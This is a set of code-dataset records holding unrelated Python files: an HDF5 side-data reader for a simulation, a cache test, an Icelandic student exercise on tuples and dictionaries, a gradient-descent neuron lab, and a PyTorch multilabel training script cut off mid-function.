filerep = filedir + 'special_%06d/' %ispec\n fsidex1 = tables.openFile(filerep + 'sides.000001')\n fsidex2 = tables.openFile(filerep + 'sides.000002')\n fsidey1 = tables.openFile(filerep + 'sides.000003')\n fsidey2 = tables.openFile(filerep + 'sides.000004')\n fsidez1 = tables.openFile(filerep + 'sides.000005')\n fsidez2 = tables.openFile(filerep + 'sides.000006')\n\n # Create sides in each direction\n self.sidex1 = sideColMPI(fsidex1)\n self.sidex2 = sideColMPI(fsidex2)\n self.sidey1 = sideColMPI(fsidey1)\n self.sidey2 = sideColMPI(fsidey2)\n self.sidez1 = sideColMPI(fsidez1)\n self.sidez2 = sideColMPI(fsidez2)\n\n fsidex1.close(); fsidex2.close()\n fsidey1.close(); fsidey2.close()\n fsidez1.close(); fsidez2.close()\n\n else:\n print(\"Wrong type!\\n'type' should be equal to 'sequential', 'collective_hdf5' or 'collective_mpi'.\")\n return\n\n# Classes for sequential dump of the sides\nclass fsideSeq:\n def __init__(self, ispec=1, filedir='./', direction='x'):\n # Define directory for the given direction\n filerep = filedir + 'special_%06d/' %ispec\n if(direction=='x'): filerep = filerep + 'sidex/'\n if(direction=='y'): filerep = filerep + 'sidey/'\n if(direction=='z'): filerep = filerep + 'sidez/'\n\n # Create lists of the files of the sides in the given direction\n self.listtop = np.sort(glob.glob(filerep + 'side*1.*'))\n self.listbot = np.sort(glob.glob(filerep + 'side*2.*'))\n self.nsq = len(self.listtop)\n\nclass sideSeq:\n def __init__(self, listf, nx, ny, nxslice, nyslice, key, direction, nbuf):\n # Initialize arrays\n rho = np.zeros((nx*nxslice, ny*nyslice))\n rhoux = 
np.zeros((nx*nxslice, ny*nyslice))\n rhouy = np.zeros((nx*nxslice, ny*nyslice))\n rhouz = np.zeros((nx*nxslice, ny*nyslice))\n E = np.zeros((nx*nxslice, ny*nyslice))\n Bx = np.zeros((nx*nxslice, ny*nyslice))\n By = np.zeros((nx*nxslice, ny*nyslice))\n Bz = np.zeros((nx*nxslice, ny*nyslice))\n\n for i in range(nxslice*nyslice):\n mype = int(listf[i].split('.')[-1])\n pos = key[mype]\n # Index in the global array for each thread file\n if(direction=='x'):\n i0 = (pos/nyslice)*nx; i1 = (pos/nyslice + 1)*nx\n j0 = (pos%nyslice)*ny; j1 = (pos%nyslice + 1)*ny\n else:\n i0 = (pos%nxslice)*nx; i1 = (pos%nxslice + 1)*nx\n j0 = (pos/nxslice)*ny; j1 = (pos/nxslice + 1)*ny\n\n # Open the file and retrieve data\n f = tables.openFile(listf[i])\n rho[i0:i1,j0:j1] = np.transpose(f.root.rho[nbuf:ny+nbuf,nbuf:nx+nbuf])\n rhoux[i0:i1,j0:j1] = np.transpose(f.root.rho_vx[nbuf:ny+nbuf,nbuf:nx+nbuf])\n rhouy[i0:i1,j0:j1] = np.transpose(f.root.rho_vy[nbuf:ny+nbuf,nbuf:nx+nbuf])\n rhouz[i0:i1,j0:j1] = np.transpose(f.root.rho_vz[nbuf:ny+nbuf,nbuf:nx+nbuf])\n Bx[i0:i1,j0:j1] = np.transpose(f.root.Bx[nbuf:ny+nbuf,nbuf:nx+nbuf])\n By[i0:i1,j0:j1] = np.transpose(f.root.By[nbuf:ny+nbuf,nbuf:nx+nbuf])\n Bz[i0:i1,j0:j1] = np.transpose(f.root.Bz[nbuf:ny+nbuf,nbuf:nx+nbuf])\n E[i0:i1,j0:j1] = np.transpose(f.root.E[nbuf:ny+nbuf,nbuf:nx+nbuf])\n f.close()\n\n self.rho = rho\n self.E = E\n self.rhou = np.transpose(np.array([rhoux,rhouy,rhouz]), (1,2,0))\n self.B = np.transpose(np.array([Bx,By,Bz]), (1,2,0))\n\n# Classes for collective dump of the sides using PHDF5\nclass sideColHDF:\n def __init__(self, fside, dim, side='x', nside=1, nbuf=3):\n # Define the selection depending on the selected side\n if(side == 'x'):\n rside = fside.root.side_x\n nxglob = dim[1]\n nyglob = dim[2]\n elif(side == 'y'):\n rside = fside.root.side_y\n nxglob = dim[0]\n nyglob = dim[2]\n elif(side == 'z'):\n rside = fside.root.side_z\n nxglob = dim[0]\n nyglob = dim[1]\n selx = [i+nbuf for i in range(nxglob)]\n sely = [i+nbuf for i in range(nyglob)]\n\n ndim = 3\n self.rhou = np.zeros((nxglob,nyglob,ndim))\n self.B = np.zeros((nxglob,nyglob,ndim))\n\n # Retrieve data\n rho = np.transpose(rside.rho[nside-1])\n self.rho = rho[selx,:][:,sely]\n E = np.transpose(rside.E[nside-1])\n self.E = E[selx,:][:,sely]\n rhoux = np.transpose(rside.rho_vx[nside-1])\n self.rhou[:,:,0] = rhoux[selx,:][:,sely]\n rhouy = np.transpose(rside.rho_vy[nside-1])\n self.rhou[:,:,1] = rhouy[selx,:][:,sely]\n rhouz = np.transpose(rside.rho_vz[nside-1])\n self.rhou[:,:,2] = rhouz[selx,:][:,sely]\n Bx = np.transpose(rside.Bx[nside-1])\n self.B[:,:,0] = Bx[selx,:][:,sely]\n By = np.transpose(rside.By[nside-1])\n self.B[:,:,1] = By[selx,:][:,sely]\n Bz = np.transpose(rside.Bz[nside-1])\n self.B[:,:,2] = Bz[selx,:][:,sely]\n\n# Classes for collective dump of the sides using MPI\nclass sideColMPI:\n def __init__(self, fside):\n # Retrieve data\n self.rho = np.transpose(fside.root.rho[:])\n self.E = np.transpose(fside.root.E[:])\n rhoux = np.transpose(fside.root.rho_vx[:])\n rhouy = np.transpose(fside.root.rho_vy[:])\n rhouz = np.transpose(fside.root.rho_vz[:])\n self.rhou = np.transpose([rhoux,rhouy,rhouz], (1,2,0))\n Bx = np.transpose(fside.root.Bx[:])\n By = np.transpose(fside.root.By[:])\n Bz = np.transpose(fside.root.Bz[:])\n self.B = np.transpose([Bx,By,Bz], (1,2,0))\n","sub_path":"dumpy_v05/data/rd_side.py","file_name":"rd_side.py","file_ext":"py","file_size_in_byte":10487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
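A minimal usage sketch for the DumsesSides reader in the record above; the run directory, ispec and dump type are illustrative assumptions, not values taken from the dataset:

    from rd_side import DumsesSides
    data = DumsesSides(ispec=1, filedir='./run01/', type='collective_hdf5')
    print(data.sidex1.rho.shape)  # density on the first x-side (global (y,z) plane)
    print(data.sidex1.B.shape)    # magnetic field on the same side, trailing axis = (Bx, By, Bz)
    # Note: tables.openFile is the PyTables 2.x spelling; PyTables 3 renamed it
    # to tables.open_file, so this record targets the older API.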
+{"seq_id":"210407415","text":"from Cache import Cache\nimport random\n\nif __name__ == '__main__':\n\n # Test the cache\n Keys = [i for i in range(7)] # Total Entries\n sites = ['www.google.com ', 'www.yahoo.com ', 'www.goal.com ', 'www.mozilla.com ',\n 'www.immigration.ca ', 'www.Ebay.com ', 'www.amazon.com ', 'www.google.com ',\n 'www.espn.com ', 'www.natgeo.com ', 'www.BBCEarth.com ']\n\n # Cache object\n cache = Cache()\n\n print('_'*30)\n # Updating Cache with entries\n for i, key in enumerate(Keys):\n if key in cache:\n continue\n else:\n value = ''.join([random.choice(sites)])\n print('\\t', value)\n cache.update(key, value)\n\n print(\"{0}.Iteration, #{1} cached entries\" .format(i+1, cache.size()))\n\n # Cache List\n print('\\n\\n\\t', '*'*10, ' CACHE LIST ', '*'*10)\n for k, v in cache.view().items():\n print(\"{0} : {1}\".format(k, v))\n print('_' * 60)\n","sub_path":"Q3. Cache/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"239039604","text":"#Höfundur Einar Karl\n#Dags. 21/2/2019\nimport random\n#Def\n#1:\ndef prentaTuple(tup):\n for x in tup:#Fer í gegnum tuple\n print(x, end=\" \")#og prentar innihaldið(x) með bili á milli\ndef paraRod(tup1, tup2):\n for x in range(len(tup1)):#Keyrir í gegnum tuple eins og oft og len af því er\n print(tup1[x],\"og\",tup2[x]) #Prentar tuple1 og tuple2 í hvert sinn\ndef paraRandom(tup1, tup2):\n for x in range(len(tup1)):#Keyrir í gegnum tuple eins og oft og len af því er\n print(random.choice(tup1),\"og\",random.choice(tup2))#Prentar random úr tuple 1 og 2 saman\ndef paraRandomStakur(tup1, tup2):\n t1=list(range(len(tup1)))#Gerir lista af len úr tuple1\n for x in range(len(t1)):#Keyrir í gegnum listan eins og oft og len af því er\n print(tup1[x],\"og\",tup2[x])#Prentar x úr tup 1 og 2\ndef finnaNafn(stafur, tup):\n l=[] #Skilgreini lista\n for x in tup: #Fer í gegnum tup\n if x.count(stafur):#Ef stafur er í tup\n l.append(x) #Setur x í listan\n return l #Skilar listanum\ndef fyrstiStafur(stafur, tup):\n l=[] #Skilgreinir lista\n for x in tup: #Fer í gegnum tup\n if x[0]==stafur: #Ef fyrsti stafurinn er sami og stafur:\n l.append(x) #Setur x í listann\n return l #Skilar listanum\ndef finnaN(tup1, tup2):\n l=[] #Skilgreinir lista\n for x in tup1: #Fer í gegnum tup1\n if x.count(\"n\")>1: #ef stafurinn 'n' er :\n l.append(x) #Setur x í lista\n for x in tup2:#Sama nema í tup2 en setur í sama lista\n if x.count(\"n\")>1:\n l.append(x)\n return l #Skilar listanum\n#2:\ndef dictNafn(nafn, dict):\n if nafn in dict: #Ef nafn er í dict:\n print(\"Símanúmerið er:\",dict.get(nafn)) #Prentar símanúmerið\n else: #Skilar þessu frá sér ef nafnið er ekki í dict\n print(\"Þetta nafn er ekki til í skránni\")\n#3:\ndef prentaDict(dict):\n print(\"Allir nemendur:\")#Prentar þetta\n for x in dict: #Fer í gegnum dict\n print(x,\"--------\",dict[x]) #Prentar key(x) og value(dict[x])\ndef dict18(dict):\n listi=[] #Skilgreinir lista\n print(\"Allir nemendur sem eru orðnir 18:\") #Prentar þetta\n for x in dict: #Fer í gegnum dict\n if dict[x] >= 18: #Ef gildi er meira eða jafnt og 18:\n listi.append(dict[x]) #Setur gildi í listann\n print(x, \"--------\", dict[x]) #Prentar key(x) og value(dict[x])\n print(\"Fjöldi nemenda sem eru orðnir 18 er\",len(listi)) #Prentar þetta með fjölda listans (len)\ndef medalDict(dict):\n listi=[] #Skilgreinir lista\n for x in dict: #Fer í gegnum dict\n listi.append(dict[x]) #Setur gildi í lista\n 
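    # Mean age = sum of the collected values / their count; printed to 2 decimals below.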
medaltal=float(sum(listi)/len(listi)) #Reiknar meðaltal gildana með listanum\n print(\"Meðalaldur bekkjarins er:\",round(medaltal,2)) #Sýnir meðalaldur með 2 aukastöfum\ndef heildDict(dict):\n listi=[] #Skilgreinir lista\n for x in dict: #Fer í gegnum dict\n listi.append(dict[x])#Setur gildin í listann\n print(\"Heildaraldur allra í bekknum er:\",sum(listi)) #Finnur summu listans (gildana)\ndef stafurDict(stafur, dict):\n l=[]#Skilgreinir lista\n for x in dict: #Fer í gegnum dict\n if x[0]==stafur:#Ef fyrsti stafurinn er sá sami og stafur:\n print(x, \"--------\", dict[x]) #Prentar key(x) og value(dict[x])\n l.append(dict[x])#Setur gildið í listann\n return l #Skilar listanum\ndef medalDictStafur(l):\n medaltal = float(sum(l) / len(l))#Reiknar meðaltal af lista\n return round(medaltal, 2) #Skilar meðaltalinu með 2 aukastöfum\n#Tuple:\nherraTuple=(\"Jón\",\"Jóngeir\",\"Arnar\",\"Halli\",\"Gunnar\",\"Gústi\")\ndomuTuple=(\"Jónína\",\"Jónun\",\"Arna\",\"Halla\",\"Gunna\",\"Gústa\")\n#Valmynd:\nval=\" \"\nwhile val !=\"4\":\n print(\"1. Danspörin\")\n print(\"2. Símaskrá\")\n print(\"3. Skráning í bekk\")\n print(\"4. Hætta\")\n val=input(\"Veldu 1-3 eða 4 til að hætta \")\n if val==\"1\":\n print(\"Herra tuple er:\")\n prentaTuple(herraTuple)\n print()#Vantaði bil\n print(\"Dömu tuple er:\")\n prentaTuple(domuTuple)\n print(\"\") #Vantaði annað bil\n print(\"Pöruð saman í röð:\")\n paraRod(herraTuple, domuTuple)\n print(\"Pöruð saman af handahófi:\")\n paraRandom(herraTuple, domuTuple)\n kk=random.sample(herraTuple,len(herraTuple)) #Tekur random úr tuple en tekur ekki sama aftur\n kvk=random.sample(domuTuple,len(domuTuple)) #Sama og uppi\n print(\"Pöruð af handahófi en stakt:\")\n paraRandomStakur(kk,kvk)\n stafur=input(\"Sláðu inn staf: \")\n print(\"Hér eru herra nöfn með stafnum\",stafur+\":\",finnaNafn(stafur, herraTuple))\n print(\"Hér eru dömu nöfn með stafnum\",stafur+\":\",finnaNafn(stafur, domuTuple))\n fyrsti=input(\"Sláðu inn fyrsta staf: \")\n print(\"Hér eru herra nöfn með stafnum\",fyrsti,\"sem fyrsta staf:\",fyrstiStafur(fyrsti,herraTuple))\n print(\"Hér eru dömu nöfn með stafnum\",fyrsti, \"sem fyrsta staf:\", fyrstiStafur(fyrsti, domuTuple))\n print(\"Nöfn sem eru með meira en eitt n:\",finnaN(herraTuple, domuTuple))\n elif val==\"2\":\n dict = {'Einar Karl':6948820,'Guðmundur':8411350,'Geir':6117573, 'Gabríel':8552428,'Róbert':8210601,'Brynjar':6960925,'Trausti':8416950,'Gabríel Elí':8441477,'Eydís':6643103,'Pétur':8992307}\n nafn = input(\"Sláðu inn nafn \")\n dictNafn(nafn, dict)\n elif val==\"3\":\n bekkjaDict={'Einar':16,'Gummi':16,'Jónas':19,'Jens':18,'Jóngeir':19,'Brynjar':17,'Trausti':18,'Róbert':17,'Geir':16,'Gabríel':17,'Dagný':16,'Guðrún':20,'Sigríður':21,'Líney':15,'Eydís':21}\n prentaDict(bekkjaDict)\n dict18(bekkjaDict)\n medalDict(bekkjaDict)\n heildDict(bekkjaDict)\n stafur=input(\"Sláðu inn staf \")\n listi=(stafurDict(stafur, bekkjaDict))\n print(\"Meðaldur þeirra er: \",medalDictStafur(listi))\n elif val==\"4\":\n print(\"Ókei bæ\")\n else:\n print(\"Rangur Innsláttur\")","sub_path":"_site/Forritun/Forritun 2/Skilaverkefni 3.py","file_name":"Skilaverkefni 3.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"323591164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 22 21:30:32 2021\n\n@author: AM4\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Считываем данные \n# df = 
pd.read_csv('https://archive.ics.uci.edu/ml/'\n# 'machine-learning-databases/iris/iris.data', header=None)\n\ndf = pd.read_csv('data.csv')\n\n# df.to_csv('data_err.csv', index=None)\n \n# возьмем перые 100 строк, 4-й столбец \ny = df.iloc[0:100, 4].values\n\n# так как ответы у нас строки - нужно перейти к численным значениям\ny = np.where(y == \"Iris-setosa\", 1, 0)\n\n# возьмем два признака, чтобы было удобне визуализировать задачу\nX = df.iloc[0:100, [0, 2]].values\n\n# добавим фиктивный признак для удобства матричных вычслений\nX = np.concatenate([np.ones((len(X),1)), X], axis = 1)\n\n# Признаки в X, ответы в y - постмотрим на плоскости как выглядит задача (y==1)\nplt.figure\nplt.scatter(X[0:50, 1], X[0:50, 2], color='red', marker='o')\nplt.scatter(X[50:100, 1], X[50:100, 2], color='blue', marker='x')\n\n# функцию нейрора из первой работы дополним функцией активации:\n# значение = f(w1*признак1+w2*признак2+w0)\n# f = 1/(1-exp(-x))\n\n# начальные значения весов зададим пока произвольно\nw = np.array([0, 0.1, 0.4])\n# сам нейрон запишем в виде одной строки\npredict = 1/(1+np.exp(-np.dot(X[1], w)))\n\n\n# gradient decent \nN=len(X)\n# инициализируем веса случайными числами, задаем скорость обучения \n# и параметр сглаживания функционала качества\nw=np.random.random((X.shape[1]))\nnu = 0.5\nlambd = 1\n\ncosts=[0] # тут будем хранить информацию об ошибке для построения графика\nw_iter = []\n\nfor i in range(100): # пока просто сделаем какое-то количество итераций\n \n # делаем начальное предсказание \n y_pred = 1/(1+np.exp(-np.dot(X, w)))\n \n #и оценку функционала качества обучения\n cost = (1/N)*np.sum((y_pred-y)**2)\n \n #вычисляем градиент\n dw=(2/N)*np.dot((y_pred-y),X)\n \n #обновляем веса\n w = w - nu * dw\n #записываем результат в список\n costs.append((1-lambd)*costs[-1]+lambd*cost) \n\n# строим результат на графике\nplt.figure\nplt.plot(costs)\n\n# вычислим ошибку на обучающей выборке\ny_pred = 1/(1+np.exp(-np.dot(X, w)))\nprint(sum(abs((y_pred>0.5)-y)))\n\n# и на полной выборке\ny_all = df.iloc[:, 4].values\ny_all = np.where(y_all == \"Iris-setosa\", 1, 0)\nX_all = df.iloc[:, [0, 2]].values\nX_all = np.concatenate([np.ones((len(X_all),1)), X_all], axis = 1)\ny_pred = 1/(1+np.exp(-np.dot(X_all, w)))\nprint(sum(abs((y_pred>0.5)-y_all)))\n\n\n# посмотрим как выглядит зависимость функционала ошибки от значений весов\n\n# созд��дим сетку параметров (весов)\nw1 = np.arange(-2,2,0.1)\nw2 = np.arange(-2,2,0.1)\nW1, W2 = np.meshgrid(w1, w2)\n\n# напишем функцию вычисления функционала ошибок так, чтобы она работала на сетке \n# w0 будет зафиксирован, w1 и w2 изменяются\ndef cost_func(X, y, W1, W2):\n cost = np.zeros(W1.shape)\n for i in range(W1.shape[0]):\n for j in range(W1.shape[1]):\n y_pred = 1/(1+np.exp(-np.dot(X, np.array([-1, W1[i,j], W2[i,j]]))))\n cost[i,j] = (1/N)*np.sum((y_pred-y)**2)\n return cost\n\n\n# строим зависимость в 3d\nfrom mpl_toolkits import mplot3d\nС = cost_func(X, y, W1, W2) # ситаем функционал ошибк на сетке весов\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\nax.plot_wireframe(W1, W2, С, color='green') # строим \"каркас\"\nax.plot_surface(W1, W2, С, rstride=1, cstride=1,\n cmap='winter', edgecolor='none') # делаем заливку поверхности\nax.set_xlabel('w1')\nax.set_ylabel('w2')\nax.set_zlabel('cost')\nplt.show()\n\n# stochastic gradient decent \nN=len(X)\nw=np.random.random((X.shape[1]))\nnu = 1\nlambd = 1\n\ncosts=[0.5]\nw_iter = []\n\nfor i in range(2): # теперь корректировку веса делаем после каждого примера\n # перебираем примеры в выборке, но т.к. 
примеры нужно выбирать случайно \n # перемешаем выборку \n new_ind = np.random.permutation(N)\n X = X[new_ind]\n y = y[new_ind]\n for x,ytarget in zip(X,y):\n \n y_pred = 1/(1+np.exp(-np.dot(x, w)))\n cost = (1/N)*np.sum(((1/(1+np.exp(-np.dot(X, w))))-y)**2)\n \n #вычисляем градиент\n dw=np.dot((y_pred-ytarget),x)\n \n #обновляем веса\n w = w - nu * dw\n #записываем результат в список\n costs.append((1-lambd)*costs[-1]+lambd*cost) \n\n# строим результат на графике\nplt.figure\nplt.plot(costs)\n\n# вычислим ошибку на обучающей выборке\ny_pred = 1/(1+np.exp(-np.dot(X, w)))\nprint(sum(abs((y_pred>0.5)-y)))\n\n# и на полной выборке\ny_pred = 1/(1+np.exp(-np.dot(X_all, w)))\nprint(sum(abs((y_pred>0.5)-y_all)))\n\n","sub_path":"lab2_sgd/lab2_neuron_sdg.py","file_name":"lab2_neuron_sdg.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"184918377","text":"import pandas as pd\nimport numpy as np\nimport warnings\nimport gc, os\nfrom time import time\nimport datetime, random\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import KFold, StratifiedKFold, GroupKFold\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.feature_selection import VarianceThreshold\nfrom sklearn.preprocessing import QuantileTransformer\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, TensorDataset, DataLoader, RandomSampler\n\nfrom iterstrat.ml_stratifiers import MultilabelStratifiedKFold\n\nimport argparse\nimport utils\nimport logging\n\n# Model\nimport model.shiji \nfrom model.shiji import SmoothBCEwLogits\nfrom model.shiji import Model\nfrom model.shiji import MoADataset\nfrom model.shiji import resnetsimpleModel\nfrom model.shiji import resnetModel\nfrom model.shiji import TestDataset\n\ndef Feature(df):\n transformers={}\n for col in (genes+cells):\n transformer = QuantileTransformer(n_quantiles=100, random_state=0, output_distribution='normal')\n transformer.fit(df[:train.shape[0]][col].values.reshape(-1, 1))\n df[col] = transformer.transform(df[col].values.reshape(-1, 1)).reshape(1, -1)[0]\n transformers[col]=transformer\n gene_pca = PCA(n_components = ncompo_genes, \n random_state = 42).fit(df[genes])\n pca_genes = gene_pca.transform(df[genes])\n cell_pca = PCA(n_components = ncompo_cells, \n random_state = 42).fit(df[cells])\n pca_cells = cell_pca.transform(df[cells])\n pca_genes = pd.DataFrame(pca_genes, columns = [f\"pca_g-{i}\" for i in range(ncompo_genes)])\n pca_cells = pd.DataFrame(pca_cells, columns = [f\"pca_c-{i}\" for i in range(ncompo_cells)])\n df = pd.concat([df, pca_genes, pca_cells], axis = 1)\n for col in ['cp_time', 'cp_dose']:\n tmp = pd.get_dummies(df[col], prefix=col)\n df = pd.concat([df, tmp], axis=1)\n df.drop([col], axis=1, inplace=True)\n return df, transformers, gene_pca, cell_pca\n\ndef Ctl_augment(train, target, include_test=0):\n if include_test==0:\n ctl_aug=ctl_train2.copy()\n if include_test==1:\n ctl_aug=ctl_train.copy()\n aug_trains = []\n aug_targets = []\n for _ in range(3):\n train1 = train.copy()\n target1 = target.copy()\n ctl1 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)#.loc[(ctl_train['cp_time']==t)&(ctl_train['cp_dose']==d)]\n ctl2 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)\n\n ctl3 = ctl_train.sample(train1.shape[0], 
replace=True).reset_index(drop=True)#.loc[(ctl_train['cp_time']==t)&(ctl_train['cp_dose']==d)]\n ctl4 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)\n mask_index1 = list(np.random.choice(ctl3.index.tolist(), int(ctl3.shape[0]*0.4), replace=False))\n ctl3.loc[mask_index1, genes+cells] = 0.0\n ctl4.loc[mask_index1, genes+cells] = 0.0\n\n ctl5 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)#.loc[(ctl_train['cp_time']==t)&(ctl_train['cp_dose']==d)]\n ctl6 = ctl_train.sample(train1.shape[0], replace=True).reset_index(drop=True)\n mask_index2 = list(np.random.choice(list(set(ctl5.index)-set(mask_index1)), int(ctl5.shape[0]*0.3), replace=False))\n ctl5.loc[mask_index1+mask_index2, genes+cells] = 0.0\n ctl6.loc[mask_index1+mask_index2, genes+cells] = 0.0\n\n train1[genes+cells] = train1[genes+cells].values + ctl1[genes+cells].values - ctl2[genes+cells].values \\\n + ctl3[genes+cells].values - ctl4[genes+cells].values + ctl5[genes+cells].values - ctl6[genes+cells].values\n\n aug_train = train1.merge(target1, how='left', on='sig_id')\n aug_trains.append(aug_train[['cp_time', 'cp_dose']+genes+cells])\n aug_targets.append(aug_train[targets])\n\n df = pd.concat(aug_trains).reset_index(drop=True)\n target = pd.concat(aug_targets).reset_index(drop=True)\n for col in (genes+cells):\n df[col] = transformers[col].transform(df[col].values.reshape(-1, 1)).reshape(1, -1)[0]\n pca_genes = gene_pca.transform(df[genes])\n pca_cells = cell_pca.transform(df[cells])\n pca_genes = pd.DataFrame(pca_genes, columns = [f\"pca_g-{i}\" for i in range(ncompo_genes)])\n pca_cells = pd.DataFrame(pca_cells, columns = [f\"pca_c-{i}\" for i in range(ncompo_cells)])\n df = pd.concat([df, pca_genes, pca_cells], axis = 1)\n\n #nor_var_col = [col for col in df.columns if col in ['sig_id', 'cp_type', 'cp_time', 'cp_dose'] or '_gt_' in col or '_lt_' in col]\n #var_cols = [col for col in df.columns if col not in ['sig_id', 'cp_type', 'cp_time', 'cp_dose'] and '_gt_' not in col and '_lt_' not in col]\n #var_data = var_thresh.transform(df[var_cols])\n #df = pd.concat([df[nor_var_col], pd.DataFrame(var_data)], axis=1)\n\n for col in ['cp_time', 'cp_dose']:\n tmp = pd.get_dummies(df[col], prefix=col)\n df = pd.concat([df, tmp], axis=1)\n df.drop([col], axis=1, inplace=True)\n xs = df[train_cols].values\n ys = target[targets]\n #ys_ns = target[targets_ns]\n return xs, ys#, ys_ns\n\ndef train_and_predict(features, sub, aug, folds=5, seed=817119, lr=1/90.0/3.5*3, weight_decay=1e-5/3):\n oof = train[['sig_id']]\n for t in targets:\n #oof[t] = 0.0\n oof.loc[:,t] = 0.0\n preds = []\n test_X = test[features].values\n test_data_loader = DataLoader(dataset=TensorDataset(torch.Tensor(test_X))\n , batch_size=1024, shuffle=False)\n\n eval_train_loss=0\n for fold, (trn_ind, val_ind) in enumerate(MultilabelStratifiedKFold(n_splits = folds, shuffle=True, random_state=seed)\\\n .split(train, train_target[targets])):\n train_X = train.loc[trn_ind, features].values\n train_Y = train_target.loc[trn_ind, targets].values\n eval_train_Y = train_target.loc[trn_ind, targets].values\n\n eval_train_dataset = MoADataset(train_X, eval_train_Y)\n eval_train_data_loader = torch.utils.data.DataLoader(eval_train_dataset\n , batch_size=128\n , shuffle=False)\n\n valid_X = train.loc[val_ind, features].values\n valid_Y = train_target.loc[val_ind, targets].values\n\n valid_dataset = MoADataset(valid_X, valid_Y, val=1)\n valid_data_loader = torch.utils.data.DataLoader(valid_dataset\n , batch_size=1024\n , shuffle=False)\n\n 
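        # Augment this training fold with control-vehicle profiles: Ctl_augment
        # (defined above) adds and subtracts randomly sampled "ctl_vehicle" rows
        # so the network trains on perturbed copies of each treated sample.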
aug_X, aug_Y = Ctl_augment(ori_train.loc[trn_ind]\n , train_target.loc[trn_ind]\n , include_test=1)\n train_X_ = np.concatenate([train_X, aug_X], axis=0)\n train_Y_ = np.concatenate([train_Y, aug_Y], axis=0)\n\n\n train_dataset = MoADataset(train_X_, train_Y_)\n train_data_loader = torch.utils.data.DataLoader(train_dataset\n , batch_size=128\n , shuffle=True)\n\n model = Model(len(features), len(targets), 1500)\n model.to(device)\n\n optimizer = torch.optim.Adam(model.parameters(), betas=(0.9, 0.99)\n , lr=1e-3\n , weight_decay=weight_decay\n , eps=1e-5)\n scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer=optimizer\n , pct_start=0.1\n , div_factor=1e3\n , max_lr=lr, epochs=EPOCHS\n , steps_per_epoch=len(train_data_loader))\n\n loss_fn = nn.BCEWithLogitsLoss()\n loss_tr = SmoothBCEwLogits(smoothing = 0.001)\n\n best_valid_metric = 1e9\n not_improve_epochs = 0\n for epoch in range(EPOCHS):\n # train\n train_loss = 0.0\n train_num = 0\n for data in (train_data_loader):\n optimizer.zero_grad()\n x, y = data['x'].to(device), data['y'].to(device)\n outputs = model(x)\n loss = loss_tr(outputs, y)\n loss.backward()\n optimizer.step()\n scheduler.step()\n train_num += x.shape[0]\n train_loss += (loss.item()*x.shape[0])\n\n train_loss /= train_num\n # eval\n model.eval()\n valid_loss = 0.0\n valid_num = 0\n for data in (valid_data_loader):\n x, y = data['x'].to(device), data['y'].to(device)\n outputs = model(x)\n loss = loss_fn(outputs, y)\n valid_num += x.shape[0]\n valid_loss += (loss.item()*x.shape[0])\n valid_loss /= valid_num\n t_preds = []\n for data in (test_data_loader):\n x = data[0].to(device)\n with torch.no_grad():\n outputs = model(x)\n t_preds.extend(list(outputs.sigmoid().cpu().detach().numpy()))\n pred_mean = np.mean(t_preds)\n if valid_loss < best_valid_metric:\n fname = os.path.join(args.model_dir\n , 'model_dnn_final_fold%s'%fold+'_'+str(seed)+'.ckpt')\n torch.save(model.state_dict(), fname)\n not_improve_epochs = 0\n best_valid_metric = valid_loss\n logging.info('[epoch %s] lr: %.6f, train_loss: %.6f, valid_metric: %.6f, pred_mean:%.6f'%(epoch, optimizer.param_groups[0]['lr'], train_loss, valid_loss, pred_mean))\n trn_loss_.append(train_loss)\n else:\n not_improve_epochs += 1\n logging.info('[epoch %s] lr: %.6f, train_loss: %.6f, valid_metric: %.6f, pred_mean:%.6f, NIE +1 ---> %s'%(epoch, optimizer.param_groups[0]['lr'], train_loss, valid_loss, pred_mean, not_improve_epochs))\n if not_improve_epochs >= 30 and epoch>15:\n break\n model.train()\n if epoch!=28:\n aug_X, aug_Y = Ctl_augment(ori_train.loc[trn_ind]\n , train_target.loc[trn_ind], include_test=1)\n train_X_ = np.concatenate([train_X, aug_X], axis=0)\n train_Y_ = np.concatenate([train_Y, aug_Y], axis=0)\n train_dataset = MoADataset(train_X_, train_Y_)\n train_data_loader = torch.utils.data.DataLoader(train_dataset\n , batch_size=128, shuffle=True)\n\n # Load best model for evaluation \n state_dict = torch.load(fname\n , torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") )\n model.load_state_dict(state_dict)\n model.eval()\n\n valid_preds = []\n for data in (valid_data_loader):\n x, y = data['x'].to(device), data['y'].to(device)\n with torch.no_grad():\n outputs = model(x)\n valid_preds.extend(list(outputs.cpu().detach().numpy()))\n oof.loc[val_ind, targets] = 1 / (1+np.exp(-np.array(valid_preds)))\n t_preds = []\n for data in (test_data_loader):\n x = data[0].to(device)\n with torch.no_grad():\n outputs = model(x)\n t_preds.extend(list(outputs.sigmoid().cpu().detach().numpy()))\n 
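        # Log the mean sigmoid output over the test set as a quick drift check,
        # then stack this fold's test predictions for fold/seed averaging below.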
